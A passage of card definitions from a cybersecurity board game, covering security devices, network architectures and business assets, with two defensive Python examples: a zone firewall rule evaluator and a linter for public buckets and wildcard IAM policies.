- Encryption inspection (needs decryption)
- Insider threats (authorized users on authorized systems)
- Application-layer attacks (SQL injection, XSS still pass through)
Network Interactions:
- Works with: SIEM (IDS alerts feed into SIEM for correlation)
- Supports: Detection of T-04 (Lateral Movement), T-09 (C2 Beaconing) in Incident Response
- Complements: IPS (IDS detects, IPS blocks; often paired)
Signature Maintenance: High (requires weekly/daily signature updates from threat intelligence)
Performance Impact: Medium (packet inspection adds latency, can slow network)
SEC-03 IPS
- Type: Threat Prevention
- Cost: 14 Budget
- Placement: Internal network (actively blocks malicious traffic)
- Primary Function: Block suspicious traffic in real-time
Description: Network-based IPS (actively protective version of IDS). Can block traffic in addition to alerting. Inline placement allows real-time threat blocking.
What It Protects Against:
- Everything IDS protects against (detection + blocking)
- Exploit attempts against known vulnerabilities
- Worm propagation
- Policy violations
What It Doesn't Protect Against:
- Same limitations as IDS, plus:
  - False positive blocking (can block legitimate traffic)
  - Encrypted traffic inspection limitations
  - Zero-day exploits
Network Interactions:
- Works with: WAF on web traffic (IPS for network, WAF for applications)
- Works with: Firewall (layered network defense)
- Supports: Defense against T-02 (Watering Hole), T-05 (Kernel Exploit) in Incident Response
Tuning Complexity: High (false positives require tuning; too aggressive = blocks legitimate traffic)
Performance Impact: Medium-High (real-time inspection + blocking adds latency)
Risk: Misconfigured IPS can block critical business traffic
SEC-04 Load Balancer
- Type: Availability & Performance
- Cost: 8 Budget
- Placement: In front of multiple web servers
- Primary Function: Distribute traffic across multiple servers
Description: Load balancer (F5, Citrix NetScaler, nginx, HAProxy) distributes incoming traffic across multiple backend servers. Increases availability and performance.
What It Protects Against:
- Single server failure (if one web server fails, traffic routes to others)
- DDoS attacks (distributes attack traffic across multiple servers)
- Overload attacks (can queue excess requests)
What It Doesn't Protect Against:
- Application vulnerabilities
- Malicious traffic targeting multiple backends
- Session hijacking
- Backend compromise (load balancer can't protect a compromised backend)
Network Interactions:
- Requires: Web Server (needs multiple instances for load balancing to make sense)
- Works with: Web Server redundancy (2+ web servers behind load balancer)
- Supports: Web application availability in Incident Response scenarios
Health Check Mechanism: Monitors backend servers; removes unhealthy servers automatically
Cost-Benefit: Low cost (8 Budget) but high value if you have multiple web servers
SEC-05 VPN Gateway
- Type: Remote Access Control
- Cost: 9 Budget
- Placement: Network perimeter (between internet and internal network)
- Primary Function: Secure remote access for employees/contractors
Description: VPN concentrator (Cisco AnyConnect, Palo Alto Prisma Access, F5 BIG-IP) that creates encrypted tunnels for remote users. Allows employees to securely access internal resources from outside the network.
What It Protects Against:
- Man-in-the-middle attacks on remote user traffic
- Credential interception (traffic encrypted)
- Unauthorized access to internal resources (authentication required)
- IP spoofing (tunnel validates source)
What It Doesn't Protect Against:
- Weak VPN credentials (still vulnerable to brute force)
- Compromised endpoint connecting via VPN (malware on home computer)
- Insider threats (authorized user with legitimate credentials)
- Application vulnerabilities accessed through VPN
Network Interactions:
- Works with: Domain Controller (VPN user auth)
- Works with: MFA (VPN should require MFA)
- Supports: Remote work scenarios (necessary for distributed teams)
Authentication Complexity: Requires MFA for security (otherwise easy brute force)
Cost-Benefit: Necessary for remote work, but alone insufficient (needs MFA)
SEC-06 Email Gateway
- Type: Email Security
- Cost: 6 Budget
- Placement: Network perimeter (filters incoming/outgoing email)
- Primary Function: Filter spam, phishing, and malware in email
Description: Email security appliance (Proofpoint, Mimecast, Cisco Email Security) that filters all incoming/outgoing email. Scans for phishing, malware, data exfiltration attempts.
What It Protects Against:
- Phishing emails (signature and behavior-based detection)
- Email-based malware (attachments, links)
- Spam (reduces alert fatigue)
- Data exfiltration via email (DLP for email)
- Email spoofing (validates SPF/DKIM/DMARC)
What It Doesn't Protect Against:
- User clicks on phishing links (user training needed)
- Advanced phishing with legitimate credentials
- Compromised internal email account sending from inside
- Zero-day malware in attachments
Network Interactions:
- Works with: Email Server (filters before reaching server)
- Works with: User Security Training (filters + training = defense-in-depth)
- Supports: Defense against T-01 (Phishing) in Incident Response
Signature Maintenance: Very high (email threats change daily)
User Experience Impact: Email delays (milliseconds) are imperceptible; false positives = missed emails
SEC-07 WAF
- Type: Application-Layer Protection
- Cost: 11 Budget
- Placement: In front of web server
- Primary Function: Block application-layer attacks (SQL injection, XSS, etc.)
Description: Web Application Firewall (ModSecurity, Cloudflare WAF, AWS WAF) that inspects HTTP traffic and blocks malicious payloads. Understands web application protocols, unlike a traditional firewall.
What It Protects Against:
- SQL injection attacks
- Cross-site scripting (XSS)
- Cross-site request forgery (CSRF)
- Remote code execution (RCE)
- Malicious file uploads
- Buffer overflows in web apps
What It Doesn't Protect Against:
- Logic flaws in application (WAF can't fix broken business logic)
- Authenticated attacks (user is authorized)
- Distributed attacks across many IPs (WAF can't distinguish)
- Zero-day application vulnerabilities (no rule exists)
Network Interactions:
- Requires: Web Server (only protects web traffic)
- Works with: IPS (network-level and application-level defense)
- Supports: Defense against T-02 (Watering Hole) in Incident Response
Rule Maintenance: Medium (OWASP rules are standardized, vendor maintains them)
False Positive Rate: Medium (needs tuning for specific web application)
Performance Impact: Medium (application inspection adds latency)
SEC-08 Network Segmentation
- Type: Network Architecture Control
- Cost: 10 Budget
- Placement: Internal network (between segmented network zones)
- Primary Function: Enforce network segmentation via VLANs and ACLs
Description: Layer 3 switch or router configured for network segmentation. Implements VLANs (virtual LANs) and layer 3 filtering to separate the network into zones (DMZ, User segment, Server segment, Admin segment).
What It Protects Against:
- Lateral movement via SMB and other internal protocols
- Credential dumping spread (isolated networks can't reach DCs)
- Compromised user system accessing servers directly
- Insider threats (restrictions on data access)
- Data exfiltration to external media (if USB segment is isolated)
What It Doesn't Protect Against:
- Attacks within same segment (switch can't prevent user↔user attacks)
- Routing around segmentation (if misconfigured)
- Physical network attacks (layer 1 problems)
- Encrypted tunneling out of segment (if firewall rule allows)
Network Interactions:
- Works with: Firewall (firewall rules enforce segmentation policies)
- Works with: Database Server (database in isolated segment)
- Works with: Zero Trust (segmentation is prerequisite for zero trust)
- Supports: Defense against T-04 (Lateral Movement) in Incident Response
Configuration Complexity: High (requires planning of segment boundaries and rules)
Cost-Benefit: Very high ROI (prevents lateral movement for 10 Budget)
SEC-09 SIEM
- Type: Threat Monitoring & Investigation
- Cost: 15 Budget
- Placement: Central monitoring (logs from all devices)
- Primary Function: Aggregate logs and detect threats via correlation
Description: Enterprise SIEM (Splunk, Elastic, QRadar, ArcSight) that collects logs from all systems, correlates events, and alerts on suspicious patterns. Foundation of a mature incident response program.
What It Protects Against:
- Multi-step attack patterns (correlation finds chains)
- Persistence mechanisms (scheduled tasks, registry changes logged)
- Credential abuse (failed login spikes)
- Insider threats (excessive file access, off-hours activity)
- Data exfiltration (unusual volume to unusual destination)
What It Doesn't Protect Against:
- Attacks happening faster than SIEM ingests logs
- False negatives (misconfigured rules miss attacks)
- Encrypted traffic inspection (needs decryption)
- Malware on endpoint (needs EDR, not SIEM)
Network Interactions:
- Requires: Log Centralization deployment (needs logs to analyze)
- Works with: IDS/IPS alerts (SIEM correlates with network alerts)
- Supports: Incident Response investigation (SIEM data essential for forensics)
- Critical for: Hardening module detection (SIEM detects Pentester Tactics)
Data Requirements: Massive (can be 10+ GB/day for large organizations)
Maintenance: Very high (tuning rules, managing data retention, responding to false positives)
Value: Essential for organizations that need incident detection
SEC-10 Honeypot Network
- Type: Deception & Detection
- Cost: 8 Budget
- Placement: Isolated segment (mimics legitimate infrastructure)
- Primary Function: Detect lateral movement and reconnaissance
Description: Network of decoy systems (not the SRV-10 honeypot server, but an entire segment) designed to attract attackers. Any access to the honeypot network indicates an active attacker.
What It Protects Against:
- Lateral movement (attacker triggers honeypot while exploring)
- Network reconnaissance (if honeypot is discovered)
- Ransomware spread (if honeypot is in ransomware path)
- Insider reconnaissance (any access to honeypot = red flag)
What It Doesn't Protect Against:
- Attacks that don't trigger honeypot (if attacker follows direct path)
- Honeypot visibility (attacker must find it to trigger it)
- False positives (must be designed to avoid accidental triggers)
Network Interactions:
- Works with: Network Segmentation (honeypot in isolated but accessible segment)
- Works with: SIEM (honeypot triggers feed into SIEM)
- Supports: Detection in Hardening module (Deception Technology defense)
Maintenance: Medium (must keep honeypot looking alive and attractive)
Cost-Benefit: Low cost (8 Budget) with high detection value (zero false positives)
| Card | Device Type | Cost | Primary Vectors | Placement |
|---|---|---|---|---|
| SEC-01 | Firewall (Perimeter) | 12 | NETWORK, CREDENTIAL | Perimeter |
| SEC-02 | IDS | 10 | MALWARE, NETWORK | Internal |
| SEC-03 | IPS | 14 | MALWARE, WEB, NETWORK | Internal |
| SEC-04 | Load Balancer | 8 | NETWORK (availability) | Web Tier |
| SEC-05 | VPN Gateway | 9 | CREDENTIAL, NETWORK | Perimeter |
| SEC-06 | Email Gateway | 6 | SOCIAL_ENG, MALWARE | Perimeter |
| SEC-07 | WAF | 11 | WEB, MALWARE | Web Tier |
| SEC-08 | Network Segmentation | 10 | CREDENTIAL, NETWORK | Internal |
| SEC-09 | SIEM | 15 | Multiple (detection) | Central |
| SEC-10 | Honeypot Network | 8 | NETWORK (detection) | Isolated |
Budgets are 40-60 by difficulty (Beginner 60 / Standard 50 / Advanced 40), and the Required servers eat most of it — plan security spending around what's left.
Network Building Module: Security Device Cards Part of Incident Zero, a modular cybersecurity board game v2.2 - Playtest Edition
cards/network-building/core-deck/architecture-cards.md
Version: 2.2 - Playtest Edition Last Updated: July 2026
Architecture Cards represent different network topology and design patterns. Each organization selects ONE architecture that determines how network segments are organized and how traffic flows between them.
Cost: 0 Budget
Complexity: 1/5 (very simple)
Security Posture: Low
Performance: High (no routing/switching overhead)
Description: All systems connected to same network segment (same subnet, same broadcast domain). No network segmentation—everything can talk to everything. Traditional small office network.
Network Design:
Internet → Firewall → Switch
├─ Email Server
├─ Web Server
├─ Database Server
├─ File Server
├─ Domain Controller
└─ User Workstations
Characteristics:
- All systems on same IP subnet (e.g., 192.168.1.0/24)
- Single broadcast domain
- No layer 3 routing between segments
- Firewall only at perimeter, not internal
What This Means for Security:
- Advantages: Simple to set up and manage, low cost
- Disadvantages: Lateral movement is trivial (attacker on user system can reach database server directly)
- Implication: If any system is compromised, entire network is at risk
Who Uses This:
- Small offices with <50 people
- Non-security-sensitive organizations
- Organizations where ease of use matters more than security
Defenses Required:
- Stronger endpoint protection (must protect each individual system)
- User security training (social engineering becomes primary attack vector)
- Cannot rely on network-level controls
Against Incident Response Threats:
- T-04 (Lateral Movement): Trivially successful (same network)
- T-06 (Mimikatz): Once DC is compromised, entire network is accessible
- T-11 (Data Exfil): No segmentation to stop data movement
Cost: 5 Budget
Complexity: 2/5 (simple but requires planning)
Security Posture: Medium
Performance: Medium (slight routing overhead)
Description: Network divided into three logical zones with firewall rules between them. This is the most common network architecture for medium-sized organizations.
Network Design:
Internet → Firewall → [DMZ Zone] → Firewall → [Internal Zone] → Firewall → [Admin Zone]
         (Perimeter)       ↓                        ↓                          ↓
                      Web Server               File Server              Domain Controller
                      Email Server             User Workstations        Admin Workstations
                                               Database Server          Backup Server
Three Zones:
- DMZ Zone - Internet-facing systems (web, email); if compromised, the firewall prevents spread to the Internal Zone
- Internal Zone - Business systems; cannot reach the Admin Zone
- Admin Zone - Administrative access and privileged systems
Firewall Rules:
- Internet → DMZ: Allowed (limited ports)
- DMZ → Internal: Blocked (one-way dependency if needed)
- Internal → Admin: Blocked (strict isolation)
- Admin → Internal: Allowed (admin management of internal systems)
- Admin → DMZ: Allowed (admin management of DMZ)
What This Means for Security:
- Advantages: Limits lateral movement (attacker on web server can't reach database server directly)
- Disadvantages: More complex to design and manage
Who Uses This:
- Most medium-sized organizations (50-500 employees)
- Organizations with some web/email presence
- Organizations that want segmentation without extreme complexity
Against Incident Response Threats:
- T-04 (Lateral Movement): Firewall rules block direct SMB access between zones; attacker must find alternate path
- T-06 (Mimikatz): DC is in Admin Zone, isolated from compromised internal system
- T-11 (Data Exfil): Must exit through firewall, can be monitored
Cost: 12 Budget
Complexity: 4/5 (complex, requires careful design)
Security Posture: Very High
Performance: Lower (strict controls add latency)
Description: Network divided into many small segments, each with strict firewall rules. No implicit trust based on network location—every connection is verified. Approximates zero-trust architecture.
Network Design:
Internet → Firewall → [DMZ Segment] → Firewall → [Each Server has own segment]
+ User segment
+ Admin segment
+ Development segment
+ Backup segment
+ Legacy segment
Each connection between segments requires explicit allow rule.
Segment Isolation:
- Every major system or group gets its own segment
- Database server isolated from file server
- Email server isolated from web server
- User workstations isolated from each other (per-user or small group segments)
- Development isolated from production
- Admin segment for domain controllers only
- Legacy systems isolated from modern systems
Firewall Rules:
- Default deny: Any traffic not explicitly allowed is blocked
- Explicit allows: Every needed connection has a specific rule
- Unidirectional: Rules are directional (client→server, not server→client)
- Port specific: Rules specify exact port, not ranges
What This Means for Security:
- Advantages: Lateral movement is nearly impossible—even if one system is compromised, firewall blocks reach to others
- Disadvantages: Very complex to design, expensive to implement, difficult to troubleshoot when legitimate traffic is blocked
Who Uses This:
- Large enterprises with security teams
- Organizations with strict compliance requirements (finance, healthcare, government)
- Organizations that assume breach and plan accordingly
Against Incident Response Threats:
- T-04 (Lateral Movement): Firewall blocks attempt immediately; attacker cannot move
- T-06 (Mimikatz): Even with DC credentials, accessing other systems requires approval
- T-11 (Data Exfil): Exfil traffic blocked by firewall rules
Governance: Requires change management process for any new firewall rules
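The 3-Zone and Fully Isolated rule sets above can be checked mechanically. The following is an added example (not part of the Incident Zero materials) that encodes both as default-deny, directional, port-specific allow rules and asks whether a given connection, such as the T-04 SMB hop from a compromised workstation, would get through. The system placements follow the card diagrams as read here, and the ARCH-03 port numbers (5432 for the database, 88/389 for Kerberos/LDAP, 3389 for admin RDP) are assumptions for the example.

```python
"""Zone/segment firewall policy evaluator (added example, not the game's own code).

Encodes ARCH-02 (3-Zone) and a small ARCH-03 (Fully Isolated) rule set as
default-deny, directional, port-specific allow rules and answers "would this
connection pass?" for a (source system, destination system, destination port).
"""
from dataclasses import dataclass

ANY_PORT = frozenset()  # empty port set == any port (for rules written just as "Allowed")


@dataclass(frozen=True)
class AllowRule:
    src_zone: str
    dst_zone: str
    ports: frozenset = ANY_PORT  # destination TCP ports the initiator may open


class ZonePolicy:
    """Default-deny policy. A connection passes only if a rule matches its
    initiating direction (src -> dst). Systems inside one zone are not separated
    by a firewall, so same-zone traffic always passes (that is the flat-network
    weakness, confined to a single zone)."""

    def __init__(self, placement, rules):
        self.placement = dict(placement)  # system name -> zone/segment
        self.rules = list(rules)

    def allows(self, src_system, dst_system, port):
        src, dst = self.placement[src_system], self.placement[dst_system]
        if src == dst:
            return True
        return any(
            r.src_zone == src and r.dst_zone == dst and (not r.ports or port in r.ports)
            for r in self.rules
        )

    def reachable_from(self, src_system, port):
        """Every other system the source could open `port` on: a lateral-movement map."""
        return sorted(s for s in self.placement
                      if s != src_system and self.allows(src_system, s, port))


# ARCH-02: placement follows the 3-Zone diagram on the card (constructed reading).
THREE_ZONE_PLACEMENT = {
    "Internet": "Internet",
    "Web Server": "DMZ", "Email Server": "DMZ",
    "File Server": "Internal", "User Workstations": "Internal", "Database Server": "Internal",
    "Domain Controller": "Admin", "Admin Workstations": "Admin", "Backup Server": "Admin",
}
THREE_ZONE_RULES = [
    AllowRule("Internet", "DMZ", frozenset({25, 443})),  # "limited ports" (assumed: SMTP, HTTPS)
    AllowRule("Admin", "Internal"),                      # admin management of internal systems
    AllowRule("Admin", "DMZ"),                           # admin management of DMZ
    # DMZ -> Internal and Internal -> Admin have no rule, so they fall to default deny.
]
three_zone = ZonePolicy(THREE_ZONE_PLACEMENT, THREE_ZONE_RULES)

# ARCH-03: every server in its own segment; only explicit, port-specific allows (ports assumed).
ISOLATED_PLACEMENT = {
    "Internet": "Internet", "Web Server": "seg-web", "Database Server": "seg-db",
    "File Server": "seg-file", "User Workstations": "seg-users",
    "Domain Controller": "seg-admin", "Admin Workstations": "seg-admin-ws",
}
ISOLATED_RULES = [
    AllowRule("Internet", "seg-web", frozenset({443})),
    AllowRule("seg-web", "seg-db", frozenset({5432})),         # web tier -> database only
    AllowRule("seg-users", "seg-file", frozenset({445})),      # users may use file shares
    AllowRule("seg-users", "seg-admin", frozenset({88, 389})), # Kerberos/LDAP to the DC
    AllowRule("seg-admin-ws", "seg-admin", frozenset({3389})), # admin RDP to the DC
]
isolated = ZonePolicy(ISOLATED_PLACEMENT, ISOLATED_RULES)

SMB = 445  # the port T-04 Lateral Movement via SMB needs

if __name__ == "__main__":
    print("3-Zone  user -> database over SMB:", three_zone.allows("User Workstations", "Database Server", SMB))
    print("3-Zone  user -> DC over SMB:      ", three_zone.allows("User Workstations", "Domain Controller", SMB))
    print("3-Zone  web -> database over SMB: ", three_zone.allows("Web Server", "Database Server", SMB))
    print("Isolated user -> database over SMB:", isolated.allows("User Workstations", "Database Server", SMB))
    print("Isolated SMB reach from a user:    ", isolated.reachable_from("User Workstations", SMB))
```

Run as a script it shows the teaching point of the two cards: in the 3-Zone design the user-to-database SMB hop succeeds because both sit in the Internal Zone, while the hops into the Admin Zone and from the DMZ are denied; in the Fully Isolated design the same SMB hop fails and the only SMB-reachable system from a workstation is the file server, because nothing else has an explicit allow.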
Cost: 8 Budget
Complexity: 3/5 (cloud adds complexity)
Security Posture: Medium-High (cloud provider handles some security)
Performance: Medium (internet latency for cloud communication)
Description: Organization has both on-premises infrastructure AND cloud resources. Some applications run on-premises, others run in cloud (AWS, Azure, GCP).
Network Design:
Internet → Firewall → On-Premises Segment
├─ Email Server (on-prem)
├─ File Server (on-prem)
├─ Database Server (on-prem)
└─ VPN/Direct Connect → Cloud
├─ Web Server (cloud)
├─ App Server (cloud)
├─ Cloud Storage
└─ Cloud Database
Connectivity Methods:
1. VPN: Encrypted tunnel over internet (slower, cheaper)
2. Direct Connect: Dedicated network connection (faster, more expensive)
What This Means for Security:
- Advantages: Flexibility (use right tool for each workload), scalability
- Disadvantages: New attack surface (cloud APIs, IAM), credential management across platforms
Cloud-Specific Risks:
- Misconfigured S3 buckets (public read access)
- Cloud IAM overly permissive (too much access)
- Cloud API keys in source code
- Data residency in unexpected regions
Who Uses This:
- Organizations transitioning to cloud (lift-and-shift)
- Organizations with variable load (burst to cloud)
- Organizations with development in cloud, production on-prem
Against Incident Response Threats:
- T-04 (Lateral Movement): Can pivot from on-prem to cloud via cloud APIs
- T-08 (Cloud breach): New threat class specific to cloud
- T-13 (Misconfiguration): Cloud-specific attack not in traditional scenarios
Cost: 6 Budget
Complexity: 2/5 (cloud provider manages complexity)
Security Posture: Medium (cloud provider security + customer configuration)
Performance: Excellent (cloud provider optimization)
Description: All infrastructure is cloud-based. No on-premises data center. Applications, data, and users all in cloud (AWS, Azure, GCP, or SaaS).
Network Design:
Internet → Cloud Edge
├─ Web Services (cloud)
├─ Application Services (cloud)
├─ Database (cloud)
├─ Storage (cloud)
└─ All managed by cloud provider
Deployment Models:
1. IaaS (Infrastructure as a Service): You manage VMs, they manage infrastructure
2. PaaS (Platform as a Service): You manage app, they manage platform
3. SaaS (Software as a Service): Vendor manages everything (Microsoft 365, Salesforce, Slack)
Cloud Provider Responsibilities:
- Physical security of data centers
- Network infrastructure
- Hardware maintenance
- Some security controls (network, storage)
Customer Responsibilities:
- IAM configuration (who can access what)
- Network configuration (security groups, VPCs)
- Encryption keys (customer-managed or provider-managed)
- Application security
What This Means for Security:
- Advantages: Offload infrastructure security to cloud provider, auto-scaling, built-in redundancy
- Disadvantages: New threat landscape (cloud-specific attacks, misconfiguration)
Cloud-Specific Risks:
- IAM overly permissive (everyone can do everything)
- Public buckets/storage (data visible to internet)
- Unused resources (exposed services)
- Cross-account/cross-tenant misconfiguration
- Cloud API abuse (stolen credentials)
Who Uses This:
- Startups (no on-prem infrastructure needed)
- SaaS vendors (cloud is core offering)
- Organizations with distributed teams (no office)
- Modern organizations building on cloud-native architecture
Against Incident Response Threats:
- T-08 (Cloud-specific): Entirely new threat surface
- T-13 (Misconfiguration): Most common cloud vulnerability
- T-07 (API abuse): Cloud APIs are attack surface
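The Cloud Hybrid and Cloud First cards both list the same two misconfigurations first: storage buckets with public read access and overly permissive IAM. Both are visible in the policy document itself, so they can be linted before a scenario turns them into a T-13 finding. The following is an added example (not part of the Incident Zero materials): the sample documents are constructed in AWS IAM policy-document shape (Version/Statement/Effect/Principal/Action/Resource), and the bucket names, account id and VPC endpoint id in them are placeholders.

```python
"""Linter for two cloud-specific risks on the architecture cards: public-read
buckets and wildcard IAM grants (added example, not the game's own code)."""
import fnmatch


def _as_list(value):
    """IAM allows a scalar or a list in most fields; normalise to a list."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def _action_covers(action_patterns, wanted):
    """True if any action pattern (IAM '*' wildcards, case-insensitive) grants `wanted`."""
    return any(fnmatch.fnmatchcase(wanted.lower(), str(p).lower())
               for p in _as_list(action_patterns))


def _principal_is_public(principal):
    """Principal "*" or {"AWS": "*"} means anyone on the internet, signed in or not."""
    if principal == "*":
        return True
    return isinstance(principal, dict) and "*" in _as_list(principal.get("AWS"))


def find_public_read(bucket_policy):
    """Allow statements that let the whole internet read objects.
    Returns [(statement index, 'unconditional' | 'conditional', resource)]."""
    hits = []
    for i, stmt in enumerate(_as_list(bucket_policy.get("Statement"))):
        if stmt.get("Effect") != "Allow" or not _principal_is_public(stmt.get("Principal")):
            continue
        if _action_covers(stmt.get("Action"), "s3:GetObject"):
            # A Condition (e.g. a source VPC endpoint) narrows "public"; still flag it for review.
            kind = "conditional" if stmt.get("Condition") else "unconditional"
            hits.append((i, kind, stmt.get("Resource")))
    return hits


def find_overly_permissive(iam_policy):
    """Allow statements that pair a wildcard action ('*' or 'service:*') with Resource '*'.
    Returns [(statement index, [broad actions])]."""
    hits = []
    for i, stmt in enumerate(_as_list(iam_policy.get("Statement"))):
        if stmt.get("Effect") != "Allow" or "*" not in _as_list(stmt.get("Resource")):
            continue
        broad = [a for a in _as_list(stmt.get("Action")) if a == "*" or str(a).endswith(":*")]
        if broad:
            hits.append((i, broad))
    return hits


# Constructed samples (placeholder names and ids).
PUBLIC_BUCKET = {"Version": "2012-10-17", "Statement": [
    {"Sid": "PublicRead", "Effect": "Allow", "Principal": "*",
     "Action": ["s3:GetObject"], "Resource": "arn:aws:s3:::example-customer-exports/*"}]}
VPC_ONLY_BUCKET = {"Version": "2012-10-17", "Statement": [
    {"Effect": "Allow", "Principal": {"AWS": "*"}, "Action": "s3:Get*",
     "Resource": "arn:aws:s3:::example-internal-reports/*",
     "Condition": {"StringEquals": {"aws:SourceVpce": "vpce-EXAMPLE"}}}]}
PRIVATE_BUCKET = {"Version": "2012-10-17", "Statement": [
    {"Effect": "Allow", "Principal": {"AWS": "arn:aws:iam::123456789012:role/app-reader"},
     "Action": "s3:GetObject", "Resource": "arn:aws:s3:::example-app-data/*"}]}
ADMIN_POLICY = {"Version": "2012-10-17", "Statement": [
    {"Effect": "Allow", "Action": "*", "Resource": "*"}]}
SCOPED_POLICY = {"Version": "2012-10-17", "Statement": [
    {"Effect": "Allow", "Action": ["s3:GetObject", "s3:PutObject"],
     "Resource": "arn:aws:s3:::example-app-data/*"}]}

if __name__ == "__main__":
    for name, pol in [("public", PUBLIC_BUCKET), ("vpc-only", VPC_ONLY_BUCKET), ("private", PRIVATE_BUCKET)]:
        print(f"bucket {name:8}: {find_public_read(pol)}")
    for name, pol in [("admin", ADMIN_POLICY), ("scoped", SCOPED_POLICY)]:
        print(f"iam {name:11}: {find_overly_permissive(pol)}")
```

The conditional case is deliberately kept as a finding rather than dropped: a `Principal: "*"` grant that is narrowed by a Condition is only as safe as that condition, which is exactly the kind of thing a reviewer wants listed for the ASSET-03 "unsecured database access = audit finding" discussion.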
| Aspect | Flat | 3-Zone | Fully Isolated | Cloud Hybrid | Cloud First |
|---|---|---|---|---|---|
| Cost (Budget) | 0 | 5 | 12 | 8 | 6 |
| Complexity | 1/5 | 2/5 | 4/5 | 3/5 | 2/5 |
| Lateral Movement Risk | Very High | Medium | Very Low | Medium-High | Medium |
| Incident Response Difficulty | Very Easy | Medium | Hard | Hard | Hard |
| Operational Overhead | Low | Medium | High | High | Low (cloud manages) |
| Best For | Tiny orgs | Medium orgs | Large/sensitive | Hybrid migration | Cloud-native |
| Scalability | Poor | Good | Excellent | Excellent | Excellent |
| Cloud Integration | None | None | Optional | Required | Only option |
Choosing architecture affects remaining budget for servers and security devices:
- ARCH-01 (Flat): 0 Budget cost, frees up budget for servers
- ARCH-02 (3-Zone): 5 Budget cost, medium budget remaining
- ARCH-03 (Fully Isolated): 12 Budget cost, significant budget consumed
- ARCH-04 (Cloud Hybrid): 8 Budget cost, cloud connectivity cost
- ARCH-05 (Cloud First): 6 Budget cost, low cost (cloud provider manages infrastructure)
Higher security architectures require more firewall rules:
- ARCH-01: 0 rules needed (flat network)
- ARCH-02: 10-20 rules (3-zone model)
- ARCH-03: 50-100+ rules (fully isolated, per-system rules)
- ARCH-04: 20-30 rules (cloud connectivity + on-prem)
- ARCH-05: 10-15 rules (cloud provider manages most)
Does your organization use cloud?
├─ No → Do you have >100 people?
│ ├─ No → Choose ARCH-01 (Flat) or ARCH-02 (3-Zone)
│ └─ Yes → Do you have compliance requirements?
│ ├─ No → Choose ARCH-02 (3-Zone)
│ └─ Yes → Choose ARCH-03 (Fully Isolated)
│
├─ Partially (hybrid) → Choose ARCH-04 (Cloud Hybrid)
│
└─ Yes, entirely cloud → Choose ARCH-05 (Cloud First)
Network Building Module: Architecture Cards Part of Incident Zero, a modular cybersecurity board game v2.2 - Playtest Edition
cards/network-building/core-deck/asset-cards.md
Version: 2.2 - Playtest Edition Last Updated: July 2026
Asset Cards represent business requirements or critical functions that the network must support. Each asset card describes a business need, and teams must ensure their network design includes appropriate servers/services to satisfy each requirement.
Business Function: Internal and external email communication
Criticality: High (nearly universal requirement)
Impact if Down: Significant (communication stops, customer requests missed)
Compliance Requirements: Email retention (SOX, GDPR), encryption (HIPAA, PCI-DSS)
Description: Organization needs reliable email system for internal communication and external customer contact. Email is both critical infrastructure and significant security risk (phishing, credential attacks, data exfiltration).
Network Requirements:
- Server: Email Server (SRV-01)
- Protection: Email Gateway (SEC-06) for phishing/malware filtering
- Optional: Load Balancer if email server needs redundancy
Security Considerations:
- Email is primary phishing attack vector (T-01 in Incident Response)
- Email contains sensitive information (must be encrypted and access-controlled)
- Email forwarding rules can be abused for data exfiltration
- Email archive must be protected and retained per compliance requirements
Dependencies:
- Requires Domain Controller for user authentication
- Requires backup for email archive recovery
- Integrates with SIEM for email security event logging
Team Design Validation:
✓ Must Include: Email Server or equivalent email service (cloud-based OK)
✓ Should Include: Email Gateway for threat filtering
✗ Failure Condition: No email capability = cannot satisfy Asset requirement
Business Function: Public-facing web application or website
Criticality: Medium (business depends on it but alternatives exist)
Impact if Down: Moderate (customers cannot access services, lost sales/engagement)
Compliance Requirements: PCI-DSS (if payments), WCAG accessibility
Description: Organization has public web presence—either corporate website, e-commerce site, or customer portal. Web server is exposed to internet and primary target for web exploits (SQL injection, RCE, DDoS).
Network Requirements:
- Server: Web Server (SRV-02) in DMZ
- Protection: WAF (SEC-07) for application-layer attack prevention
- Optional: Load Balancer (SEC-04) for redundancy and DDoS protection
Security Considerations:
- Web servers have highest internet attack surface
- Vulnerable to web exploits (T-02 Watering Hole, T-05 Kernel Exploit in Incident Response)
- DDoS attacks can take down web server
- Code injection can compromise entire application
- Requires patching and web application security testing
Dependencies:
- Often connects to Database (for dynamic content)
- May require load balancer for redundancy
- Requires SIEM monitoring for web security events
Team Design Validation:
✓ Must Include: Web Server (SRV-02) or cloud-hosted web service
✓ Should Include: WAF for attack protection
✓ Should Include: Load Balancer if redundancy needed
✗ Failure Condition: No web server = Asset unsatisfied
Business Function: Data storage and retrieval for critical business data
Criticality: Very High (most sensitive business data)
Impact if Down: Severe (business cannot operate, financial/customer impact)
Compliance Requirements: PCI-DSS, HIPAA, GDPR, SOX (depending on data type)
Description: Centralized database for customer data, financial records, operational data. Database is most valuable attack target—contains the "crown jewels." Database compromise often defines loss condition in Incident Response.
Network Requirements:
- Server: Database Server (SRV-03) in restricted/admin segment
- Protection: Network Segmentation (SEC-08) to limit access
- Optional: Backup Server (SRV-07) for recovery capability
Security Considerations:
- Database is primary exfiltration target (T-10, T-11 in Incident Response)
- SQL injection attacks compromise database
- Credential abuse allows unauthorized access to sensitive data
- Data exfiltration is often attack goal (customer PII, financial data)
- Database compromise may be game-loss condition
- Must have immutable backups for recovery from ransomware
Dependencies:
- Requires strong authentication (MFA, password vault)
- Requires Data Loss Prevention (DLP) to prevent exfiltration
- Requires encryption at rest and in transit
- Requires database activity monitoring (DAM) for audit
Team Design Validation:
✓ Must Include: Database Server or equivalent data store (Cloud Workload hosting is allowed but is a recorded risk)
✓ Should Include: Network Segmentation to isolate database access
✓ Should Include: Backup Server for disaster recovery
✗ Failure Condition: No database = Asset unsatisfied OR unsecured database access = audit finding
Business Function: Shared file storage for documents, projects, compliance records
Criticality: High (business relies on shared documents)
Impact if Down: Moderate-High (work stops, cannot access needed files)
Compliance Requirements: Data retention (GDPR), data classification (HIPAA, PCI-DSS)
Description: Shared network file storage for collaborative work. File servers often contain mixed-sensitivity data (company policy next to customer PII next to trade secrets). Poorly secured file storage is source of data exfiltration and lateral movement.
Network Requirements:
- Server: File Server (SRV-04) in protected segment
- Protection: Network Segmentation (SEC-08) to limit file access
- Optional: DLP (in Hardening module) to prevent sensitive file exfiltration
Security Considerations:
- File servers are lateral movement target (T-04 in Incident Response)
- SMB protocol allows attacker to enumerate shares and attempt access
- Over-permissive file permissions = data exfiltration vector
- Ransomware frequently targets file servers (T-11 in Incident Response)
- File permissions audit is critical for compliance
Dependencies:
- Requires Domain Controller for user authentication
- Requires Network Segmentation to limit SMB access
- Requires backup strategy (especially for ransomware recovery)
- Requires file permission auditing
Team Design Validation:
